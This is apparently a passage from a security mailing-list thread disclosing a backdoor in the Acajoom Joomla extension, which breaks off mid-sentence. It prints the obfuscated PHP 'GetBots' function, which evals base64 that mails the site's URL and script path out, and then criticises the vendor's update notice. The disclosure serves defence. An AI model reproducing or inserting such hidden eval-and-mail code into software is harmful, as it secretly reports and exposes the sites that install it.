==
@mail($us1, $us2, http://.$us2.$_SERVER['SCRIPT_NAME'].\n.$us3);
not are stupids, there are one virus.
function GetBots($us1,$us2,$us3) {
list($data1,$data2,$data3) = array('dHA6Ly8iLiR1czIuJF9TRVJWRVJbJ',
'QG1haWwoJHVzMSwgJHVzMiwgImh0','1NDUklQVF9OQU1FJ10uIlxuIi4kdXMzKTs');
eval(base64_decode($data2.$data1.$data3));
}
An early release of 4.0.0 has the same problem!
So Acajoom has a general security issue or the developers were stupid enough to
develop with old code.
... or the developers were stupid enough to develop with old code.
Stupid may be a bit harsh. I find 'Software Security' is also a frame
of mind that *must* be backed by education. Perhaps the developers
lack the knowledge they need to model the threats and incorporate a
secure architecture.
The vendor has issued an update, but the explanation falsely minimises
the problem. (They also did not credit qa...@ya.ru, nor anyone else.)
http://www.ijoobi.com/blog/latest/acajoom-free-version-3.2.7-available.html
states: Acajoom GPL 3.2.7 is available for immediate download. We
recommend
